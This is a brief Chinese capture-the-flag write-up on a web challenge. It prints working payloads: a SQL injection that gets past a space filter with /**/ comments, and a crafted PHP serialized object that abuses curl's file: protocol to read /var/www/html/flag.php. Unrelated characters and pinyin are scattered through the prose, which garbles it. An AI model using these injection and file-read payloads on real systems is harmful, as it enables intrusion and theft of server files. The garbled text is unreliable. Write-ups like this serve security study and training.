廢話:好久沒(méi)寫(xiě)WP了(WTM忘了......)
第一步胧弛,發(fā)現(xiàn)view.php存在SQL注入尤误,簡(jiǎn)單的過(guò)濾了空格,用/**/代替繞過(guò)结缚。
payload:
?no=0/**/union/**/select/**/1,2,3,4#
發(fā)現(xiàn)報(bào)錯(cuò)损晤,unserialize()說(shuō)明數(shù)據(jù)以序列化字符串存儲(chǔ),報(bào)錯(cuò)信息暴露了網(wǎng)站目錄:/var/www/html/
利用curl不僅可以http红竭、https還可使用file協(xié)議的特性尤勋,構(gòu)造反序列字符串即可
第二步,祭出目錄掃描器茵宪,發(fā)現(xiàn)robot.txt里有信息最冰,存在user.php.bak源碼泄露
利用user.php成功構(gòu)造序列化字符串
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}
payload:
/view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}'#
訪問(wèn)發(fā)現(xiàn)讀取欄沒(méi)變化,可把我慌了稀火,查看源代碼
源碼.png
base64解碼后成功得到FLAG
